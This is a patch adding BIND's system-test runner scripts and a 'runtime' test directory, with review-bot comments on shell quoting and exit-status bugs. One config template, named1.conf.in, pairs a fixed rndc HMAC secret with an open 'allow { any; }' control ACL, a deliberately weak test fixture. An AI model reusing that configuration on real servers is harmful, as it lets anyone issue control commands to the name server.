+ echoend "E:$systest:$(date_with_args)"
+ exit 0
+fi
+
+# Clean up files left from any potential previous runs except when
+# started with the --restart option.
+if ! $restart; then
+ if test -f "$systest/clean.sh"; then
+ if ! ( cd "${systest}" && $SHELL clean.sh "$@" ); then
+ echowarn "I:$systest:clean.sh script failed"
+ echofail "R:$systest:FAIL"
+ echoend "E:$systest:$(date_with_args)"
+ exit 1
+ fi
+ fi
+fi
+
+# Set up any dynamically generated test data
+if test -f $systest/setup.sh
+then
+ if ! ( cd "${systest}" && $SHELL setup.sh "$@" ); then
+ echowarn "I:$systest:setup.sh script failed"
+ echofail "R:$systest:FAIL"
+ echoend "E:$systest:$(date_with_args)"
+ exit 1
+ fi
+fi
+
+status=0
+run=0
+# Run the tests
+if [ -r "$systest/tests.sh" ]; then
+ if start_servers; then
+ ( cd "$systest" && $SHELL tests.sh "$@" )
+ status=$?
+ run=$((run+1))
+ stop_servers || status=1
+ else
+ status=1
+ fi
+fi
+
+if [ $status -eq 0 ]; then
+ if [ -n "$PYTEST" ]; then
+ for test in $(cd "${systest}" && find . -name "tests*.py"); do
+ rm -f "$systest/$test.status"
+ if start_servers; then
+ run=$((run+1))
+ test_status=0
+ (cd "$systest" && "$PYTEST" --confcutdir ../ -rsxX -v "$test" "$@" || echo "$?" > "$test.status") | SYSTESTDIR="$systest" cat_d
+ if [ -f "$systest/$test.status" ]; then
+ if [ "$(cat "$systest/$test.status")" != "5" ]; then
+ test_status=$(cat "$systest/$test.status")
+ fi
+ fi
+ status=$((status+test_status))
+ stop_servers || status=1
+ else
+ status=1
+ fi
+ if [ $status -ne 0 ]; then
+ break
+ fi
+ done
+ rm -f "$systest/$test.status"
+ else
+ echoinfo "I:$systest:pytest not installed, skipping python tests"
+ fi
+fi
+
+if [ "$run" -eq "0" ]; then
+ echoinfo "I:$systest:No tests were found and run"
+ status=255
+fi
+
+
+if $stopservers
+then
+ :
+else
+ exit $status
+fi
+
+get_core_dumps() {
+ find "$systest/" \( -name 'core' -or -name 'core.*' -or -name '*.core' \) ! -name '*.gz' ! -name '*.txt' | sort
+}
+
+core_dumps=$(get_core_dumps | tr '\n' ' ')
+if [ -n "$core_dumps" ]; then
+ echoinfo "I:$systest:Core dump(s) found: $core_dumps"
+ get_core_dumps | while read -r coredump; do
+ SYSTESTDIR="$systest"
+ echoinfo "D:$systest:backtrace from $coredump:"
+ echoinfo "D:$systest:--------------------------------------------------------------------------------"
+ binary=$(gdb --batch --core="$coredump" 2>/dev/null | sed -ne "s|Core was generated by \`\([^' ]*\)[' ].*|\1|p")
+ if [ ! -f "${binary}" ]; then
+ binary=$(find "${TOP}" -path "*/.libs/${binary}" -type f)
+ fi
+ "${TOP}/libtool" --mode=execute gdb \
+ -batch \
+ -ex bt \
+ -core="$coredump" \
+ -- \
+ "$binary" 2>/dev/null | sed -n '/^Core was generated by/,$p' | cat_d
+ echoinfo "D:$systest:--------------------------------------------------------------------------------"
+ coredump_backtrace="${coredump}-backtrace.txt"
+ echoinfo "D:$systest:full backtrace from $coredump saved in $coredump_backtrace"
+ "${TOP}/libtool" --mode=execute gdb \
+ -batch \
+ -command="${TOP_SRCDIR}/bin/tests/system/run.gdb" \
+ -core="$coredump" \
+ -- \
+ "$binary" > "$coredump_backtrace" 2>&1
+ echoinfo "D:$systest:core dump $coredump archived as $coredump.gz"
+ gzip -1 "${coredump}"
+ done
+ status=$((status+1))
+fi
+
+assertion_failures=$(find "$systest/" -name named.run -exec grep "assertion failure" {} + | wc -l)
+if [ "$assertion_failures" -ne 0 ]; then
+ SYSTESTDIR="$systest"
+ echoinfo "I:$systest:$assertion_failures assertion failure(s) found"
+ status=$((status+1))
+fi
+
+tsan_failures=$(find "$systest/" -name 'tsan.*' | wc -l)
+if [ "$tsan_failures" -ne 0 ]; then
+ echoinfo "I:$systest:$tsan_failures sanitizer report(s) found"
+ find "$systest/" -name 'tsan.*' -exec grep "SUMMARY: " {} + | sort -u | cat_d
+ status=$((status+1))
+fi
+
+if [ "$status" -ne 0 ]; then
+ echofail "R:$systest:FAIL"
+else
+ echopass "R:$systest:PASS"
+ if $clean && ! $restart; then
+ ( cd $systest && $SHELL clean.sh "$@" )
+ if test -d ../../../.git; then
+ git status -su --ignored "${systest}/" 2>/dev/null | \
+ sed -n -e 's|^?? \(.*\)|I:'${systest}':file \1 not removed|p' \
+ -e 's|^!! \(.*/named.run\)$|I:'${systest}':file \1 not removed|p' \
+ -e 's|^!! \(.*/named.memstats\)$|I:'${systest}':file \1 not removed|p'
+ fi
+ fi
+fi
+
+NAMED_RUN_LINES_THRESHOLD=200000
+find "${systest}" -type f -name "named.run" -exec wc -l {} \; | awk "\$1 > ${NAMED_RUN_LINES_THRESHOLD} { print \$2 }" | sort | while read -r LOG_FILE; do
+ echowarn "I:${systest}:${LOG_FILE} contains more than ${NAMED_RUN_LINES_THRESHOLD} lines, consider tweaking the test to limit disk I/O"
+done
+
+echoend "E:$systest:$(date_with_args)"
+
+exit $status
diff --git a/bin/tests/system/runall.sh b/bin/tests/system/runall.sh
new file mode 100755
index 0000000..0391633
--- /dev/null
+++ b/bin/tests/system/runall.sh
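Review bot: The post-run cleanup in run.sh, `( cd $systest && $SHELL clean.sh "$@" )`, is neither guarded nor quoted, while the pre-run cleanup earlier in the same script checks `test -f "$systest/clean.sh"` and quotes the directory. A test directory without clean.sh therefore prints a shell error after a PASS, and the call's exit status is discarded. Writing it as `if test -f "$systest/clean.sh"; then ( cd "$systest" && $SHELL clean.sh "$@" ); fi` matches the earlier block. `$systest` comes straight from the command line and is also unquoted in `[ ! -d $systest ]`, in the prereq.sh and setup.sh existence checks, and inside the three `sed` expressions. The usage string also omits `-t`, and the `r` accepted by `getopts "knp:r-:t"` has no `case` branch, so it is silently ignored.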
@@ -0,0 +1,107 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# Run all the system tests.
+#
+# Usage:
+# runall.sh [-c] [-n] [numprocesses]
+#
+# -c Force colored output.
+#
+# -n Noclean. Keep all output files produced by all tests. These
+# can later be removed by running "cleanall.sh".
+#
+# numprocess Number of concurrent processes to use when running the tests.
+# The default is one, which causes the tests to run sequentially.
+# (This is ignored when running on Windows as the tests are always
+# run sequentially on that platform.)
+
+SYSTEMTESTTOP=.
+. $SYSTEMTESTTOP/conf.sh
+
+usage="Usage: ./runall.sh [-c] [-n] [numprocesses]"
+
+# Preserve values of environment variables which are already set.
+
+SYSTEMTEST_FORCE_COLOR=${SYSTEMTEST_FORCE_COLOR:-0}
+SYSTEMTEST_NO_CLEAN=${SYSTEMTEST_NO_CLEAN:-0}
+
+# Handle command line switches if present.
+
+while getopts "cn" flag; do
+ case "$flag" in
+ c) SYSTEMTEST_FORCE_COLOR=1 ;;
+ n) SYSTEMTEST_NO_CLEAN=1 ;;
+ esac
+done
+export NOCLEAN
+shift `expr $OPTIND - 1`
+
+# Obtain number of processes to use.
+
+if [ $# -eq 0 ]; then
+ numproc=1
+elif [ $# -eq 1 ]; then
+ test "$1" -eq "$1" > /dev/null 2>&1
+ if [ $? -ne 0 ]; then
+ # Value passed is not numeric
+ echo "$usage" >&2
+ exit 1
+ fi
+ numproc=$1
+else
+ echo "$usage" >&2
+ exit 1
+fi
+
+# Run the tests.
+
+export SYSTEMTEST_FORCE_COLOR
+export SYSTEMTEST_NO_CLEAN
+
+status=0
+
+if [ "$NOPARALLEL" = "" ]; then
+ if [ "$CYGWIN" = "" ]; then
+ # Running on Unix, use "make" to run tests in parallel.
+ make -j $numproc check
+ status=$?
+ else
+ # Running on Windows: Cygwin "make" is available, but isn't being
+ # used for the build. So we create a special makefile for the purpose
+ # of parallel execution of system tests, and use that.
+ $SHELL parallel.sh > parallel.mk
+ make -f parallel.mk -j $numproc check
+ $SHELL ./runsequential.sh
+ $SHELL ./testsummary.sh || status=1
+ fi
+else
+ # the NOPARALLEL environment variable indicates that tests must be
+ # run sequentially.
+ $PERL testsock.pl || {
+ cat <<-EOF
+ I:NOTE: System tests were skipped because they require the
+ I: test IP addresses 10.53.0.* to be configured as alias
+ I: addresses on the loopback interface. Please run
+ I: "bin/tests/system/ifconfig.sh up" as root to configure them.
+ EOF
+ exit 1
+ }
+ {
+ for testdir in $SUBDIRS; do
+ $SHELL run.sh $testdir || status=1
+ done
+ } 2>&1 | tee "systests.output"
+fi
+
+exit $status
diff --git a/bin/tests/system/runsequential.sh b/bin/tests/system/runsequential.sh
new file mode 100755
index 0000000..41f9c83
--- /dev/null
+++ b/bin/tests/system/runsequential.sh
@@ -0,0 +1,27 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# Run system tests that must be run sequentially
+#
+# Note: Use "make check" (or runall.sh) to run all the system tests. This
+# script will just run those tests that require that each of their nameservers
+# is the only one running on an IP address.
+#
+
+SYSTEMTESTTOP=.
+. $SYSTEMTESTTOP/conf.sh
+
+for d in $SEQUENTIALDIRS
+do
+ $SHELL run.sh "${@}" $d 2>&1 | tee test.output.$d
+done
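Review bot: In the NOPARALLEL branch of runall.sh the `for testdir in $SUBDIRS` loop sits in a brace group piped into `tee`, so it runs in a subshell and the `status=1` set when `run.sh` fails never reaches the final `exit $status`; a sequential run with failing security tests still exits 0. Recording the failure somewhere that survives the subshell fixes it, for example `$SHELL run.sh $testdir || : > systests.failed` in the loop and `[ ! -f systests.failed ] || status=1` after the pipeline (the marker name is only an illustration and must be removed before the loop starts). `runsequential.sh` pipes `run.sh` into `tee` the same way, so its exit status is that of `tee`; the Cygwin branch appears to rely on `testsummary.sh` for the verdict there. Separately, `export NOCLEAN` exports a variable this script never sets; the flag it parses is `SYSTEMTEST_NO_CLEAN`, which is exported further down.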
diff --git a/bin/tests/system/runtime/README b/bin/tests/system/runtime/README new file mode 100644 index 0000000..9272f12 --- /dev/null +++ b/bin/tests/system/runtime/README @@ -0,0 +1,13 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +SPDX-License-Identifier: MPL-2.0 + +This Source Code Form is subject to the terms of the Mozilla Public +License, v. 2.0. If a copy of the MPL was not distributed with this +file, you can obtain one at https://mozilla.org/MPL/2.0/. + +See the COPYRIGHT file distributed with this work for additional +information regarding copyright ownership. + +Tests of runtime checks, e.g., that named prevents duplicate processes +from running. diff --git a/bin/tests/system/runtime/clean.sh b/bin/tests/system/runtime/clean.sh new file mode 100644 index 0000000..39fdc0c --- /dev/null +++ b/bin/tests/system/runtime/clean.sh @@ -0,0 +1,25 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +[ -d ns2/nope ] && chmod 755 ns2/nope + +rm -f *.pid +rm -f */named*.run +rm -f */named.memstats +rm -f kill*.out +rm -f ns*/managed-keys.bind* +rm -f ns*/named.lock ns*/named*.pid ns*/other.lock +rm -f ns2/named.conf ns2/named-alt*.conf +rm -f rndc.out* +rm -rf ns2/nope +rm -rf ns2/tmp.* diff --git a/bin/tests/system/runtime/ctrl-chars b/bin/tests/system/runtime/ctrl-chars new file mode 100644 index 0000000..4ce1650 --- /dev/null +++ b/bin/tests/system/runtime/ctrl-chars @@ -0,0 +1 @@ +
\ No newline at end of file diff --git a/bin/tests/system/runtime/long-cmd-line b/bin/tests/system/runtime/long-cmd-line new file mode 100644 index 0000000..e691a71 --- /dev/null +++ b/bin/tests/system/runtime/long-cmd-line 
@@ -0,0 +1 @@ +-m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m 
usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m 
usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m 
usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m 
usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage diff --git a/bin/tests/system/runtime/ns2/named-alt1.conf.in b/bin/tests/system/runtime/ns2/named-alt1.conf.in new file mode 100644 index 0000000..4efb3d7 --- /dev/null +++ b/bin/tests/system/runtime/ns2/named-alt1.conf.in @@ -0,0 +1,25 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + query-source address 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { fd92:7065:b8e:ffff::2; }; + recursion no; + notify yes; + dnssec-validation no; +}; 
diff --git a/bin/tests/system/runtime/ns2/named-alt2.conf.in b/bin/tests/system/runtime/ns2/named-alt2.conf.in
new file mode 100644
index 0000000..ab374f8
--- /dev/null
+++ b/bin/tests/system/runtime/ns2/named-alt2.conf.in
@@ -0,0 +1,25 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS2
+
+options {
+ query-source address 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; 10.53.0.3; };
+ listen-on-v6 { fd92:7065:b8e:ffff::2; };
+ recursion no;
+ notify yes;
+ dnssec-validation no;
+};
diff --git a/bin/tests/system/runtime/ns2/named-alt3.conf.in b/bin/tests/system/runtime/ns2/named-alt3.conf.in
new file mode 100644
index 0000000..0f351aa
--- /dev/null
+++ b/bin/tests/system/runtime/ns2/named-alt3.conf.in
@@ -0,0 +1,26 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS2
+
+options {
+ query-source address 10.53.0.2;
+ port @PORT@;
+ pid-file "named-alt3.pid";
+ lock-file none;
+ listen-on { 10.53.0.2; 10.53.0.3; };
+ listen-on-v6 { fd92:7065:b8e:ffff::2; };
+ recursion no;
+ notify yes;
+ dnssec-validation no;
+};
diff --git a/bin/tests/system/runtime/ns2/named-alt4.conf.in b/bin/tests/system/runtime/ns2/named-alt4.conf.in
new file mode 100644
index 0000000..aa3a010
--- /dev/null
+++ b/bin/tests/system/runtime/ns2/named-alt4.conf.in
@@ -0,0 +1,21 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ directory "./nope";
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+};
diff --git a/bin/tests/system/runtime/ns2/named-alt5.conf.in b/bin/tests/system/runtime/ns2/named-alt5.conf.in
new file mode 100644
index 0000000..23d09b5
--- /dev/null
+++ b/bin/tests/system/runtime/ns2/named-alt5.conf.in
@@ -0,0 +1,21 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ managed-keys-directory "./nope";
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+};
diff --git a/bin/tests/system/runtime/ns2/named-alt6.conf.in b/bin/tests/system/runtime/ns2/named-alt6.conf.in
new file mode 100644
index 0000000..3ebc140
--- /dev/null
+++ b/bin/tests/system/runtime/ns2/named-alt6.conf.in
@@ -0,0 +1,21 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ new-zones-directory "./nope";
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+};
diff --git a/bin/tests/system/runtime/ns2/named-alt7.conf.in b/bin/tests/system/runtime/ns2/named-alt7.conf.in
new file mode 100644
index 0000000..49f38b4
--- /dev/null
+++ b/bin/tests/system/runtime/ns2/named-alt7.conf.in
@@ -0,0 +1,19 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { fd92:7065:b8e:ffff::2; };
+};
diff --git a/bin/tests/system/runtime/ns2/named-alt9.conf.in b/bin/tests/system/runtime/ns2/named-alt9.conf.in
new file mode 100644
index 0000000..6ae88e5
--- /dev/null
+++ b/bin/tests/system/runtime/ns2/named-alt9.conf.in
@@ -0,0 +1,20 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ port @PORT@;
+ pid-file "named9.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+};
diff --git a/bin/tests/system/runtime/ns2/named1.conf.in b/bin/tests/system/runtime/ns2/named1.conf.in
new file mode 100644
index 0000000..b389863
--- /dev/null
+++ b/bin/tests/system/runtime/ns2/named1.conf.in
@@ -0,0 +1,34 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS2
+
+options {
+ query-source address 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { fd92:7065:b8e:ffff::2; };
+ recursion no;
+ notify yes;
+ dnssec-validation no;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
diff --git a/bin/tests/system/runtime/setup.sh b/bin/tests/system/runtime/setup.sh
new file mode 100644
index 0000000..8ab72a3
--- /dev/null
+++ b/bin/tests/system/runtime/setup.sh
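Review bot: In named1.conf.in the `key rndc_key` block carries a fixed HMAC secret and the `controls` statement uses `allow { any; }`, with nothing in the file marking either as fixture-only. The combination is tolerable only because the listener is 10.53.0.2, which the harness expects to be a loopback alias (runall.sh says the 10.53.0.* addresses are aliases on the loopback interface). A comment above the `key` block would keep the file from being copied as a template, for example `// Test fixture: fixed rndc key and open control ACL, valid only on the 10.53.0.x loopback aliases.`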
@@ -0,0 +1,36 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+$SHELL clean.sh
+
+copy_setports ns2/named1.conf.in ns2/named.conf
+
+copy_setports ns2/named-alt1.conf.in ns2/named-alt1.conf
+copy_setports ns2/named-alt2.conf.in ns2/named-alt2.conf
+copy_setports ns2/named-alt3.conf.in ns2/named-alt3.conf
